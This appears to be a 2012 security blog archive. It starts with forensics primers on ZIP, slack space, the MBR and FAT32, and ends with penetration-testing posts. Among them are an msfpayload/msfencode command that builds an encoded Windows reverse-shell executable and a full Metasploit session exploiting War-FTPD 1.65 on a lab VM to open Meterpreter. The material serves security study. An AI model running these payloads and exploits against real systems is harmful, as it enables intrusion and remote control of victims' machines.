Sunday, 18 March 2012

ZIP File Structure

Zip is a file format used for data compression and archiving. A zip file contains one or more files that have been compressed, to reduce file size, or stored as is. The zip file format permits a number of compression algorithms.
The format was originally created in 1989 by Phil Katz, and was first implemented in PKWARE's PKZIP utility, as a replacement for the previous ARC compression format by Thom Henderson.
The zip format is now supported by many software utilities other than PKZIP. Microsoft has included built-in zip support (under the name "compressed folders") in versions of Microsoft Windows since 1998. Apple has included built-in zip support in Mac OS X 10.3 (via BOMArchiveHelper, now Archive Utility) and later, along with other compression formats.
Zip files generally use the file extensions ".zip" or ".ZIP" and the MIME media type application/zip. Zip is used as a base file format by many programs, usually under a different name.
Zip files are often represented by a document or other object prominently featuring a zipper.

Magic Number

Magic numbers are common in programs across many operating systems. Magic numbers implement strongly typed data and are a form of in-band signaling to the controlling program that reads the data type(s) at program run-time. Many files have such constants that identify the contained data. Detecting such constants in files is a simple and effective way of distinguishing between many file formats and can yield further run-time information.
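As an added example (not part of the original post), the script below shows both ideas from the two sections above in working code: it identifies a file by its leading magic number, and it parses the first ZIP local file header (the fixed 30-byte layout from the PKZIP APPNOTE) to recover the member name, compression method, CRC and sizes. The magic table is a constructed subset, and the sample archive is built in memory with Python's own zipfile module so the script runs offline.

```python
import io
import struct
import zipfile

# Constructed table of leading magic numbers for a few common formats.
# The two "PK" signatures are the ones defined in the PKZIP APPNOTE.
MAGIC_TABLE = {
    b"PK\x03\x04": "zip (local file header)",
    b"PK\x05\x06": "zip (empty archive: end-of-central-directory only)",
    b"\x7fELF": "elf",
    b"MZ": "windows executable (MZ/PE)",
    b"%PDF": "pdf",
    b"\x89PNG\r\n\x1a\n": "png",
}


def identify(data: bytes) -> str:
    """Return the format whose magic number prefixes `data`, or 'unknown'."""
    # Longest signature first, so a long magic is never shadowed by a shorter prefix.
    for magic in sorted(MAGIC_TABLE, key=len, reverse=True):
        if data.startswith(magic):
            return MAGIC_TABLE[magic]
    return "unknown"


# ZIP local file header, little-endian:
# signature(4) version(2) flags(2) method(2) time(2) date(2) crc32(4)
# compressed_size(4) uncompressed_size(4) name_len(2) extra_len(2)
LOCAL_HEADER = struct.Struct("<4sHHHHHIIIHH")   # 30 bytes


def parse_local_header(data: bytes) -> dict:
    """Parse the first local file header of a ZIP byte string."""
    if len(data) < LOCAL_HEADER.size:
        raise ValueError("too short for a local file header")
    (sig, version, flags, method, _mtime, _mdate, crc,
     csize, usize, name_len, extra_len) = LOCAL_HEADER.unpack_from(data, 0)
    if sig != b"PK\x03\x04":
        raise ValueError("bad local file header signature %r" % sig)
    name_start = LOCAL_HEADER.size
    name = data[name_start:name_start + name_len].decode("utf-8", "replace")
    return {
        "version_needed": version,
        "flags": flags,
        "method": method,            # 0 = stored, 8 = deflate
        "crc32": crc,
        "compressed_size": csize,
        "uncompressed_size": usize,
        "filename": name,
        "extra_len": extra_len,
        # Offset of the member's data: header + name + extra field.
        "data_offset": name_start + name_len + extra_len,
    }


def build_sample_zip() -> bytes:
    """Constructed sample archive: one stored (uncompressed) member."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_STORED) as zf:
        zf.writestr("hello.txt", b"hello, zip")
    return buf.getvalue()


if __name__ == "__main__":
    sample = build_sample_zip()
    print(identify(sample))
    print(parse_local_header(sample))
```

A leading-magic check is fast triage, not proof: ZIP readers locate the end-of-central-directory record from the end of the file, so a valid archive may start with unrelated bytes, and a magic number is trivially forged. Treat it as one signal alongside a full parse, never as a substitute for checking the content itself.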

Unallocated Space

Unallocated Space is available disk space that is not allocated to any volume. The type of volume that you can create on unallocated space depends on the disk type. On basic disks, you can use unallocated space to create primary or extended partitions. On dynamic disks, you can use unallocated space to create dynamic volumes.

Unallocated space is simply defined as the area or space on the hard drive of the computer that is available to write data to.  

Slack Space

Slack space, sometimes referred to as file slack, is the area between the end of a file and the end of the last cluster or sector used by that file. This area will not be used to store any other information, so it is "wasted". Slack space is common in file systems that use a large cluster size, while a file system that uses a small cluster size can organize the storage medium more effectively and efficiently. The amount of wasted disk space can be estimated by multiplying the number of files (including the number of directories) by half the size of a cluster. For example, a personal computer that stores 10 000 files in a file system that uses a cluster size of 4 kilobytes will have approximately 10 000 x 2 MB ~= 20000 KB of slack. On a large file server, slack space can even reach tens of gigabytes.
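The following added example (mine, not from the original post) turns the paragraph above into code: exact per-file slack for a given cluster size, the half-cluster-per-file rule of thumb, and a comparison of total slack across cluster sizes for the same set of files. The file sizes and cluster sizes are constructed inputs.

```python
import math


def cluster_slack(file_size: int, cluster_size: int) -> int:
    """Bytes between the end of a file and the end of its last cluster."""
    if cluster_size <= 0:
        raise ValueError("cluster size must be positive")
    if file_size == 0:
        return 0                      # an empty file occupies no data cluster
    clusters = math.ceil(file_size / cluster_size)
    return clusters * cluster_size - file_size


def estimated_total_slack(num_files: int, cluster_size: int) -> int:
    """Rule of thumb from the text: about half a cluster wasted per file."""
    return num_files * (cluster_size // 2)


def measured_total_slack(file_sizes, cluster_size: int) -> int:
    """Exact slack for a known list of file sizes."""
    return sum(cluster_slack(size, cluster_size) for size in file_sizes)


def slack_by_cluster_size(file_sizes, cluster_sizes) -> dict:
    """Total slack the same files would waste under each candidate cluster size."""
    return {cs: measured_total_slack(file_sizes, cs) for cs in cluster_sizes}


if __name__ == "__main__":
    # Constructed file sizes in bytes.
    sizes = [5000, 4096, 1]
    print(cluster_slack(5000, 4096))                 # 3192
    print(estimated_total_slack(10000, 4096))        # 20480000 bytes = 20000 KB
    print(slack_by_cluster_size(sizes, [512, 4096]))
```

The 10 000-file estimate comes out at 20 480 000 bytes, i.e. 20 000 KB, matching the text's figure. For forensic work the same arithmetic matters in the other direction: the slack bytes are never overwritten by the file that owns the cluster, so they can still hold fragments of whatever previously occupied that space.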

Thursday, 15 March 2012

MBR (Master Boot Record)

What is the MBR?
At the end of the ROM BIOS bootstrap routine, the BIOS reads and executes the first physical sector of the first floppy or hard disk on the system. This first sector of the hard disk is called the master boot record (or sometimes the partition table or master boot block). There is a small program at the beginning of this sector of the hard disk. The partition information, or partition table, is stored at the end of this sector. This program uses the partition information to determine which partition is bootable (usually the first primary DOS partition) and attempts to boot from it. 
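As an added example that is not part of the original post, the script below parses the layout described above: a 512-byte sector with boot code at the start, four 16-byte partition entries at offset 446, and the 0x55AA signature at offset 510. It also includes the check a forensic examiner would want, flagging partition entries whose sector ranges overlap. The sample MBR is constructed in code (a two-byte jump loop padded with NOPs, one bootable FAT32 entry and one Linux entry).

```python
import struct

SECTOR_SIZE = 512
PARTITION_TABLE_OFFSET = 446
# Partition entry: status(1) CHS start(3) type(1) CHS end(3) LBA start(4) sector count(4)
ENTRY = struct.Struct("<B3sB3sII")   # 16 bytes


def parse_mbr(sector: bytes) -> dict:
    """Split one MBR sector into boot code and its non-empty partition entries."""
    if len(sector) != SECTOR_SIZE:
        raise ValueError("an MBR is exactly one 512-byte sector")
    if sector[510:512] != b"\x55\xaa":
        raise ValueError("missing 0x55AA boot signature")
    partitions = []
    for i in range(4):
        off = PARTITION_TABLE_OFFSET + i * ENTRY.size
        status, _chs_start, ptype, _chs_end, lba, count = ENTRY.unpack_from(sector, off)
        if ptype == 0:
            continue                  # empty slot
        partitions.append({
            "index": i,
            "bootable": status == 0x80,
            "type": ptype,
            "lba_start": lba,
            "sectors": count,
        })
    return {"boot_code": sector[:PARTITION_TABLE_OFFSET], "partitions": partitions}


def bootable_partition(mbr: dict):
    """The entry the boot code would pick: the first one with the active flag."""
    for p in mbr["partitions"]:
        if p["bootable"]:
            return p
    return None


def find_overlaps(partitions):
    """Index pairs of partitions whose sector ranges overlap (a sign of tampering
    or a corrupt table)."""
    ranges = sorted((p["lba_start"], p["lba_start"] + p["sectors"], p["index"])
                    for p in partitions)
    overlaps = []
    for (s1, e1, i1), (s2, e2, i2) in zip(ranges, ranges[1:]):
        if s2 < e1:
            overlaps.append((i1, i2))
    return overlaps


def build_sample_mbr() -> bytes:
    """Constructed sample: jmp $ loop + NOP padding, FAT32 (bootable) and Linux entries."""
    boot_code = b"\xeb\xfe" + b"\x90" * (PARTITION_TABLE_OFFSET - 2)
    fat32 = ENTRY.pack(0x80, b"\x01\x01\x00", 0x0B, b"\xfe\xff\xff", 2048, 204800)
    linux = ENTRY.pack(0x00, b"\xfe\xff\xff", 0x83, b"\xfe\xff\xff", 206848, 409600)
    empty = b"\x00" * ENTRY.size
    return boot_code + fat32 + linux + empty + empty + b"\x55\xaa"


if __name__ == "__main__":
    mbr = parse_mbr(build_sample_mbr())
    for p in mbr["partitions"]:
        print(p)
    print("boots from:", bootable_partition(mbr))
    print("overlaps:", find_overlaps(mbr["partitions"]))
```

When examining a real disk image, compare the boot code bytes against a known-good MBR from the same OS installer as well: the 446-byte program runs before the operating system, so a modified one is a classic place for a bootkit to hide.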

File System Structure

  • FAT16
FAT16 is a file system whose allocation units are addressed with 16 bits, so it can hold up to 2^16 allocation units (65536). This file system has a capacity limit of only 4 Gigabytes. The allocation unit size used by a FAT16 partition depends on the capacity that is about to be formatted: if the partition size is less than 16 megabytes, Windows will use the FAT12 file system, and if the partition size is larger than 16 megabytes, Windows will use the FAT16 file system. The following table contains information on each operating system that supports the FAT16 file system.
  • FAT32
FAT32 uses a smaller allocation unit size than the FAT12/FAT16 file systems, so FAT32 is more efficient when applied to a large partition (size greater than 512 Megabytes). The saving made by FAT32 compared with FAT16/FAT12 is approximately 20 to 27%. Windows 98 has a utility that can be used to convert a FAT16 partition to FAT32 without losing data.

FAT32 is a derivative of the File Allocation Table (FAT) file system that supports drives with over 2GB of storage. Because FAT32 drives can contain more than 65,526 clusters, smaller clusters are used than on large FAT16 drives. This method results in more efficient space allocation on the FAT32 drive.
The largest possible file for a FAT32 drive is 4GB minus 2 bytes.
The FAT32 file system includes four bytes per cluster within the file allocation table. Note that the high 4 bits of the 32-bit values in the FAT32 file allocation table are reserved and are not part of the cluster number.
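As an added example (not from the original post), the code below applies the last paragraph: each FAT32 table entry is a 32-bit value whose high 4 bits are reserved, so the cluster number is the low 28 bits. It masks those bits, classifies entries (free, bad, end-of-chain, next cluster) and follows a file's cluster chain, stopping cleanly on the failure modes a forensic parser meets: bad-cluster marks, out-of-range values and loops. The FAT table is a constructed list of raw entries indexed by cluster number.

```python
FAT32_MASK = 0x0FFFFFFF          # low 28 bits carry the cluster number
FAT32_BAD = 0x0FFFFFF7
FAT32_EOC_MIN = 0x0FFFFFF8       # 0x0FFFFFF8..0x0FFFFFFF mark end of chain


def fat32_cluster(entry: int) -> int:
    """Strip the reserved high 4 bits from a raw 32-bit FAT32 entry."""
    return entry & FAT32_MASK


def classify(entry: int) -> str:
    value = fat32_cluster(entry)
    if value == 0:
        return "free"
    if value == FAT32_BAD:
        return "bad"
    if value >= FAT32_EOC_MIN:
        return "end-of-chain"
    return "next"


def follow_chain(fat, start: int):
    """Walk a cluster chain from `start`.

    Returns (clusters_visited, status); status is "ok" for a chain that ends
    in an end-of-chain mark, otherwise a short description of the defect.
    """
    chain, seen, cluster = [], set(), start
    while True:
        if cluster < 2 or cluster >= len(fat):          # clusters 0 and 1 are reserved
            return chain, "out of range at %d" % cluster
        if cluster in seen:
            return chain, "loop at cluster %d" % cluster
        seen.add(cluster)
        chain.append(cluster)
        kind = classify(fat[cluster])
        if kind == "end-of-chain":
            return chain, "ok"
        if kind != "next":
            return chain, "%s entry at cluster %d" % (kind, cluster)
        cluster = fat32_cluster(fat[cluster])


# Constructed FAT: index = cluster number, value = raw 32-bit table entry.
SAMPLE_FAT = [
    0x0FFFFFF8,   # 0: media descriptor entry (reserved)
    0xFFFFFFFF,   # 1: reserved
    3,            # 2 -> 3
    4,            # 3 -> 4
    0xFFFFFFFF,   # 4: end of chain, with the reserved high bits set
    0xA0000006,   # 5 -> 6, high bits contain junk that must be masked off
    0x0FFFFFFF,   # 6: end of chain
    0x0FFFFFF7,   # 7: bad cluster
    9,            # 8 -> 9
    8,            # 9 -> 8  (loop)
]

if __name__ == "__main__":
    for start in (2, 5, 7, 8):
        print(start, follow_chain(SAMPLE_FAT, start))
```

Forgetting the mask is a real bug class: an entry such as 0xA0000006 would be read as a huge cluster number and, in a parser without range checks, as an out-of-bounds read. The same walk also exposes cross-linked or looping chains, which carving tools must detect rather than follow forever.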

Monday, 05 March 2012

DVWA Medium Security Exploitation Linux

Damn Vulnerable Web Application (DVWA) is a web-based hacking practice tool written in PHP/MySQL. DVWA can be an option for beginners to learn web hacking techniques from scratch; various web attack techniques can be practised with this tool. DVWA runs on a local server (localhost),
but before we open DVWA we must first start apache and mysql.
After that we open DVWA, which is activated as shown below, and enter our username and password.

Wednesday, 29 February 2012

Update Beef And Metasploit

Open BeEF from App > Exploitation Tool > Social Engineering Tool > BEEF XSS framework > BeEF_ng. It will show the console as in the picture below.

Monday, 27 February 2012

Attack Vector Exploit And Browse

Open your BeEF.

Auxiliary Modules Using Msf

This module performs SNMP sweeps against the given range of network addresses using a well-known set of community strings (snmp_login) and prints the discovered SNMP device information on the screen.
root@bt:~# msfconsole 

Social Engineering And Toolkit

Social engineering is also known as human hacking: it is the act of manipulating the human mind in order to reach a goal. Social engineering is a common term, and everyone applies it in daily life, but the use of social engineering in penetration testing and hacking is a bit different. The main uses of social engineering in hacking are to obtain information, to maintain access, and so on.

There are a variety of social engineering tips and tricks available on the Internet; in addition, the Social Engineering Toolkit is available to carry out computer-based social engineering attacks....

Msfencode And Msfpayload

The shellcode produced by msfpayload is fully functional, but it contains some null characters which, when interpreted by many programs, signal the end of a string, and this will cause the code to terminate before completion. In other words.

root@bt:~# msfpayload windows/shell_reverse_tcp LHOST= LPORT=4444 R | msfencode -e x86/shikata_ga_nai -t exe > sexy.exe 
[*] x86/shikata_ga_nai succeeded with size 341 (iteration=1)
The picture is below.

Msfpayload is a component of Metasploit used to generate shellcode and executables for use in exploitation outside of the Framework. Shellcode can be generated in many formats, including C, Ruby, JavaScript and even Visual Basic for Applications. Each output format is useful in different situations.


root@bt:~# msfconsole 

IIIIII    dTb.dTb        _.---._
  II     4'  v  'B   .'"".'/|`.""'.
  II     6.     .P  :  .' / |  `.  :
  II     'T;. .;P'  '.'  /  |    `.'
  II      'T; ;P'    `. /   |    .'
IIIIII     'YvP'       `-.__|__.-'

I love shells --egypt

       =[ metasploit v4.2.0-dev [core:4.2 api:1.0]
+ -- --=[ 787 exploits - 425 auxiliary - 128 post
+ -- --=[ 238 payloads - 27 encoders - 8 nops
       =[ svn r14551 updated 14 days ago (2012.01.14)

Warning: This copy of the Metasploit Framework was last updated 14 days ago.
         We recommend that you update the framework at least every other day.
         For information on updating your copy of Metasploit, please see:

msf > use exploit/windows/ftp/warftpd_165_user
msf exploit(warftpd_165_user) > search warftp

Matching Modules

Name Disclosure Date Rank Description
---- --------------- ---- -----------
exploit/windows/ftp/warftpd_165_pass 1998-03-19 average War-FTPD 1.65 Password Overflow
exploit/windows/ftp/warftpd_165_user 1998-03-19 average War-FTPD 1.65 Username Overflow

msf exploit(warftpd_165_user) > show options

Module options (exploit/windows/ftp/warftpd_165_user):

Name Current Setting Required Description
---- --------------- -------- -----------
FTPPASS mozilla@example.com no The password for the specified username
FTPUSER anonymous no The username to authenticate as
RHOST yes The target address
RPORT 21 yes The target port

msf exploit(warftpd_165_user) > set RHOST
msf exploit(warftpd_165_user) > show options

Module options (exploit/windows/ftp/warftpd_165_user):

Name Current Setting Required Description
---- --------------- -------- -----------
FTPPASS mozilla@example.com no The password for the specified username
FTPUSER anonymous no The username to authenticate as
RHOST yes The target address
RPORT 21 yes The target port

msf exploit(warftpd_165_user) > show payloads

Compatible Payloads

Name Disclosure Date Rank Description
---- --------------- ---- -----------
generic/custom normal Custom Payload
generic/debug_trap normal Generic x86 Debug Trap
generic/shell_bind_tcp normal Generic Command Shell, Bind TCP Inline
generic/shell_reverse_tcp normal Generic Command Shell, Reverse TCP Inline
generic/tight_loop normal Generic x86 Tight Loop
windows/dllinject/bind_ipv6_tcp normal Reflective Dll Injection, Bind TCP Stager (IPv6)
windows/dllinject/bind_nonx_tcp normal Reflective Dll Injection, Bind TCP Stager (No NX or Win7)
windows/dllinject/bind_tcp normal Reflective Dll Injection, Bind TCP Stager
windows/dllinject/reverse_http normal Reflective Dll Injection, Reverse HTTP Stager
windows/dllinject/reverse_ipv6_http normal Reflective Dll Injection, Reverse HTTP Stager (IPv6)
windows/dllinject/reverse_ipv6_tcp normal Reflective Dll Injection, Reverse TCP Stager (IPv6)
windows/dllinject/reverse_nonx_tcp normal Reflective Dll Injection, Reverse TCP Stager (No NX or Win7)
windows/dllinject/reverse_ord_tcp normal Reflective Dll Injection, Reverse Ordinal TCP Stager (No NX or Win7)
windows/dllinject/reverse_tcp normal Reflective Dll Injection, Reverse TCP Stager
windows/dllinject/reverse_tcp_allports normal Reflective Dll Injection, Reverse All-Port TCP Stager
windows/dllinject/reverse_tcp_dns normal Reflective Dll Injection, Reverse TCP Stager (DNS)
windows/download_exec normal Windows Executable Download and Execute
windows/exec normal Windows Execute Command
windows/loadlibrary normal Windows LoadLibrary Path
windows/messagebox normal Windows MessageBox
windows/meterpreter/bind_ipv6_tcp normal Windows Meterpreter (Reflective Injection), Bind TCP Stager (IPv6)
windows/meterpreter/bind_nonx_tcp normal Windows Meterpreter (Reflective Injection), Bind TCP Stager (No NX or Win7)
windows/meterpreter/bind_tcp normal Windows Meterpreter (Reflective Injection), Bind TCP Stager
windows/meterpreter/reverse_http normal Windows Meterpreter (Reflective Injection), Reverse HTTP Stager
windows/meterpreter/reverse_https normal Windows Meterpreter (Reflective Injection), Reverse HTTPS Stager
windows/meterpreter/reverse_ipv6_http normal Windows Meterpreter (Reflective Injection), Reverse HTTP Stager (IPv6)
windows/meterpreter/reverse_ipv6_https normal Windows Meterpreter (Reflective Injection), Reverse HTTPS Stager (IPv6)
windows/meterpreter/reverse_ipv6_tcp normal Windows Meterpreter (Reflective Injection), Reverse TCP Stager (IPv6)
windows/meterpreter/reverse_nonx_tcp normal Windows Meterpreter (Reflective Injection), Reverse TCP Stager (No NX or Win7)
windows/meterpreter/reverse_ord_tcp normal Windows Meterpreter (Reflective Injection), Reverse Ordinal TCP Stager (No NX or Win7)
windows/meterpreter/reverse_tcp normal Windows Meterpreter (Reflective Injection), Reverse TCP Stager
windows/meterpreter/reverse_tcp_allports normal Windows Meterpreter (Reflective Injection), Reverse All-Port TCP Stager
windows/meterpreter/reverse_tcp_dns normal Windows Meterpreter (Reflective Injection), Reverse TCP Stager (DNS)
windows/metsvc_bind_tcp normal Windows Meterpreter Service, Bind TCP
windows/metsvc_reverse_tcp normal Windows Meterpreter Service, Reverse TCP Inline
windows/patchupdllinject/bind_ipv6_tcp normal Windows Inject DLL, Bind TCP Stager (IPv6)
windows/patchupdllinject/bind_nonx_tcp normal Windows Inject DLL, Bind TCP Stager (No NX or Win7)
windows/patchupdllinject/bind_tcp normal Windows Inject DLL, Bind TCP Stager
windows/patchupdllinject/reverse_ipv6_tcp normal Windows Inject DLL, Reverse TCP Stager (IPv6)
windows/patchupdllinject/reverse_nonx_tcp normal Windows Inject DLL, Reverse TCP Stager (No NX or Win7)
windows/patchupdllinject/reverse_ord_tcp normal Windows Inject DLL, Reverse Ordinal TCP Stager (No NX or Win7)
windows/patchupdllinject/reverse_tcp normal Windows Inject DLL, Reverse TCP Stager
windows/patchupdllinject/reverse_tcp_allports normal Windows Inject DLL, Reverse All-Port TCP Stager
windows/patchupdllinject/reverse_tcp_dns normal Windows Inject DLL, Reverse TCP Stager (DNS)
windows/patchupmeterpreter/bind_ipv6_tcp normal Windows Meterpreter (skape/jt injection), Bind TCP Stager (IPv6)
windows/patchupmeterpreter/bind_nonx_tcp normal Windows Meterpreter (skape/jt injection), Bind TCP Stager (No NX or Win7)
windows/patchupmeterpreter/bind_tcp normal Windows Meterpreter (skape/jt injection), Bind TCP Stager
windows/patchupmeterpreter/reverse_ipv6_tcp normal Windows Meterpreter (skape/jt injection), Reverse TCP Stager (IPv6)
windows/patchupmeterpreter/reverse_nonx_tcp normal Windows Meterpreter (skape/jt injection), Reverse TCP Stager (No NX or Win7)
windows/patchupmeterpreter/reverse_ord_tcp normal Windows Meterpreter (skape/jt injection), Reverse Ordinal TCP Stager (No NX or Win7)
windows/patchupmeterpreter/reverse_tcp normal Windows Meterpreter (skape/jt injection), Reverse TCP Stager
windows/patchupmeterpreter/reverse_tcp_allports normal Windows Meterpreter (skape/jt injection), Reverse All-Port TCP Stager
windows/patchupmeterpreter/reverse_tcp_dns normal Windows Meterpreter (skape/jt injection), Reverse TCP Stager (DNS)
windows/shell/bind_ipv6_tcp normal Windows Command Shell, Bind TCP Stager (IPv6)
windows/shell/bind_nonx_tcp normal Windows Command Shell, Bind TCP Stager (No NX or Win7)
windows/shell/bind_tcp normal Windows Command Shell, Bind TCP Stager
windows/shell/reverse_http normal Windows Command Shell, Reverse HTTP Stager
windows/shell/reverse_ipv6_http normal Windows Command Shell, Reverse HTTP Stager (IPv6)
windows/shell/reverse_ipv6_tcp normal Windows Command Shell, Reverse TCP Stager (IPv6)
windows/shell/reverse_nonx_tcp normal Windows Command Shell, Reverse TCP Stager (No NX or Win7)
windows/shell/reverse_ord_tcp normal Windows Command Shell, Reverse Ordinal TCP Stager (No NX or Win7)
windows/shell/reverse_tcp normal Windows Command Shell, Reverse TCP Stager
windows/shell/reverse_tcp_allports normal Windows Command Shell, Reverse All-Port TCP Stager
windows/shell/reverse_tcp_dns normal Windows Command Shell, Reverse TCP Stager (DNS)
windows/shell_bind_tcp normal Windows Command Shell, Bind TCP Inline
windows/shell_reverse_tcp normal Windows Command Shell, Reverse TCP Inline
windows/speak_pwned normal Windows Speech API - Say "You Got Pwned!"
windows/upexec/bind_ipv6_tcp normal Windows Upload/Execute, Bind TCP Stager (IPv6)
windows/upexec/bind_nonx_tcp normal Windows Upload/Execute, Bind TCP Stager (No NX or Win7)
windows/upexec/bind_tcp normal Windows Upload/Execute, Bind TCP Stager
windows/upexec/reverse_http normal Windows Upload/Execute, Reverse HTTP Stager
windows/upexec/reverse_ipv6_http normal Windows Upload/Execute, Reverse HTTP Stager (IPv6)
windows/upexec/reverse_ipv6_tcp normal Windows Upload/Execute, Reverse TCP Stager (IPv6)
windows/upexec/reverse_nonx_tcp normal Windows Upload/Execute, Reverse TCP Stager (No NX or Win7)
windows/upexec/reverse_ord_tcp normal Windows Upload/Execute, Reverse Ordinal TCP Stager (No NX or Win7)
windows/upexec/reverse_tcp normal Windows Upload/Execute, Reverse TCP Stager
windows/upexec/reverse_tcp_allports normal Windows Upload/Execute, Reverse All-Port TCP Stager
windows/upexec/reverse_tcp_dns normal Windows Upload/Execute, Reverse TCP Stager (DNS)
windows/vncinject/bind_ipv6_tcp normal VNC Server (Reflective Injection), Bind TCP Stager (IPv6)
windows/vncinject/bind_nonx_tcp normal VNC Server (Reflective Injection), Bind TCP Stager (No NX or Win7)
windows/vncinject/bind_tcp normal VNC Server (Reflective Injection), Bind TCP Stager
windows/vncinject/reverse_http normal VNC Server (Reflective Injection), Reverse HTTP Stager
windows/vncinject/reverse_ipv6_http normal VNC Server (Reflective Injection), Reverse HTTP Stager (IPv6)
windows/vncinject/reverse_ipv6_tcp normal VNC Server (Reflective Injection), Reverse TCP Stager (IPv6)
windows/vncinject/reverse_nonx_tcp normal VNC Server (Reflective Injection), Reverse TCP Stager (No NX or Win7)
windows/vncinject/reverse_ord_tcp normal VNC Server (Reflective Injection), Reverse Ordinal TCP Stager (No NX or Win7)
windows/vncinject/reverse_tcp normal VNC Server (Reflective Injection), Reverse TCP Stager
windows/vncinject/reverse_tcp_allports normal VNC Server (Reflective Injection), Reverse All-Port TCP Stager
windows/vncinject/reverse_tcp_dns normal VNC Server (Reflective Injection), Reverse TCP Stager (DNS)

msf exploit(warftpd_165_user) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(warftpd_165_user) > show options

Module options (exploit/windows/ftp/warftpd_165_user):

Name Current Setting Required Description
---- --------------- -------- -----------
FTPPASS mozilla@example.com no The password for the specified username
FTPUSER anonymous no The username to authenticate as
RHOST yes The target address
RPORT 21 yes The target port

Payload options (windows/meterpreter/reverse_tcp):

Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique: seh, thread, process, none
LHOST yes The listen address
LPORT 4444 yes The listen port

msf exploit(warftpd_165_user) > set LHOST
msf exploit(warftpd_165_user) > show options

Module options (exploit/windows/ftp/warftpd_165_user):

Name Current Setting Required Description
---- --------------- -------- -----------
FTPPASS mozilla@example.com no The password for the specified username
FTPUSER anonymous no The username to authenticate as
RHOST yes The target address
RPORT 21 yes The target port

Payload options (windows/meterpreter/reverse_tcp):

Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique: seh, thread, process, none
LHOST yes The listen address
LPORT 4444 yes The listen port

msf exploit(warftpd_165_user) > show targets

Exploit targets:

Id Name
-- ----
0 Windows 2000 SP0-SP4 English
1 Windows XP SP0-SP1 English
2 Windows XP SP2 English
3 Windows XP SP3 English

msf exploit(warftpd_165_user) > set targets 3
targets => 3
msf exploit(warftpd_165_user) > show options

Module options (exploit/windows/ftp/warftpd_165_user):

Name Current Setting Required Description
---- --------------- -------- -----------
FTPPASS mozilla@example.com no The password for the specified username
FTPUSER anonymous no The username to authenticate as
RHOST yes The target address
RPORT 21 yes The target port

Payload options (windows/meterpreter/reverse_tcp):

Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique: seh, thread, process, none
LHOST yes The listen address
LPORT 4444 yes The listen port

msf exploit(warftpd_165_user) > show options

Module options (exploit/windows/ftp/warftpd_165_user):

Name Current Setting Required Description
---- --------------- -------- -----------
FTPPASS mozilla@example.com no The password for the specified username
FTPUSER anonymous no The username to authenticate as
RHOST yes The target address
RPORT 21 yes The target port

Payload options (windows/meterpreter/reverse_tcp):

Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique: seh, thread, process, none
LHOST yes The listen address
LPORT 4444 yes The listen port

msf exploit(warftpd_165_user) > exploit

[-] Exploit failed: A target has not been selected.
msf exploit(warftpd_165_user) > set target 3
target => 3
msf exploit(warftpd_165_user) > show options

Module options (exploit/windows/ftp/warftpd_165_user):

Name Current Setting Required Description
---- --------------- -------- -----------
FTPPASS mozilla@example.com no The password for the specified username
FTPUSER anonymous no The username to authenticate as
RHOST yes The target address
RPORT 21 yes The target port

Payload options (windows/meterpreter/reverse_tcp):

Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique: seh, thread, process, none
LHOST yes The listen address
LPORT 4444 yes The listen port

Exploit target:

Id Name
-- ----
3 Windows XP SP3 English

msf exploit(warftpd_165_user) > exploit

[*] Started reverse handler on
[-] Exploit exception: The connection was refused by the remote host (
[*] Exploit completed, but no session was created.
msf exploit(warftpd_165_user) > exploit

[*] Started reverse handler on
[*] Trying target Windows XP SP3 English...
[*] Sending stage (752128 bytes) to
[*] Meterpreter session 1 opened ( -> at 2012-02-27 20:27:04 +0700

meterpreter > ps
Process list
PID Name Arch Session User Path
--- ---- ---- ------- ---- ----
0 [System Process]
1040 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\System32\svchost.exe
1104 svchost.exe x86 0 C:\WINDOWS\system32\svchost.exe
1156 svchost.exe x86 0 C:\WINDOWS\system32\svchost.exe
1496 spoolsv.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\spoolsv.exe
1600 svchost.exe x86 0 WEKO-9B92FC1EF0\weko C:\WINDOWS\system32\svchost.exe
1660 explorer.exe x86 0 WEKO-9B92FC1EF0\weko C:\WINDOWS\Explorer.EXE
1712 alg.exe x86 0 C:\WINDOWS\System32\alg.exe
1808 VBoxTray.exe x86 0 WEKO-9B92FC1EF0\weko C:\WINDOWS\system32\VBoxTray.exe
1816 GrooveMonitor.exe x86 0 WEKO-9B92FC1EF0\weko C:\Program Files\Microsoft Office\Office12\GrooveMonitor.exe
1828 ctfmon.exe x86 0 WEKO-9B92FC1EF0\weko C:\WINDOWS\system32\ctfmon.exe
1984 svchost.exe x86 0 WEKO-9B92FC1EF0\weko C:\WINDOWS\system32\svchost.exe
2136 wscntfy.exe x86 0 WEKO-9B92FC1EF0\weko C:\WINDOWS\system32\wscntfy.exe
3120 wuauclt.exe x86 0 WEKO-9B92FC1EF0\weko C:\WINDOWS\system32\wuauclt.exe
3464 wpabaln.exe x86 0 WEKO-9B92FC1EF0\weko C:\WINDOWS\system32\wpabaln.exe
4 System x86 0
4064 war-ftpd.exe x86 0 WEKO-9B92FC1EF0\weko C:\Documents and Settings\weko\My Documents\instaler\war-ftpd.exe
444 AntDS.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\BigAntSoft\AntServer\AntDS.exe
464 AntServer.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\BigAntSoft\AntServer\AntServer.exe
488 AvServer.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\BigAntSoft\AntServer\AvServer.exe
520 smss.exe x86 0 NT AUTHORITY\SYSTEM \SystemRoot\System32\smss.exe
584 csrss.exe x86 0 NT AUTHORITY\SYSTEM \??\C:\WINDOWS\system32\csrss.exe
608 winlogon.exe x86 0 NT AUTHORITY\SYSTEM \??\C:\WINDOWS\system32\winlogon.exe
660 services.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\services.exe
672 lsass.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\lsass.exe
828 VBoxService.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\VBoxService.exe
872 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\svchost.exe
